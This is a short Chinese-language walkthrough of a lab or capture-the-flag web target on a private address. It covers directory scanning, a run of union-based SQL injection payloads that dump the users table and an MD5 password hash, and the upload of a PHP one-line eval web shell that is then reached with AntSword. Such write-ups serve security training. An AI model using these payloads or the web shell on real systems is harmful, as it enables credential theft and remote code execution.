一.端口扫描
用工具扫描出他的端口 可以看到我们的端口是192.168.133.165
二.目录扫描
使用dirsearch工具扫描目录
dirsearch -u http://192.168.133.165/
三.漏洞挖掘
我们打开网页的后台管理 点击右下方 注册账号
创建完成后登录你所创建的用户 来到这个页面 单机 search 出现书单
1.验证sql注入
1' and 1=1#
存在SQL注入,使用sqlmap工具注入后面的
2.判断字段
1' order by 3 #
说明字段数是3
3.查看数据库
-1' union select database(),2,3 #
4.查看数据库表名
看到数据库中存在books表和users表;猜测users表包含账户信息
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #
5.查看users表所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users' #
6.查看数据
看到超级用户跟相应密码 可是密码是加密得需要MD5解密
选择superadmin对应的密码 2386acb2cf356944177746fc92523983
使用md5解密 解密后的密码 如下图
7.登录进去
然后我们去登陆 超级用户
进去可以看到上传文件,在上传一句话木马
<?php @eval ($POST[cmd]);?>
然后去访问我们传进去的一句话木马的 文件 shell.php
8.最后用蚁剑连接 就成功进去了
好了成功!!拿到shell了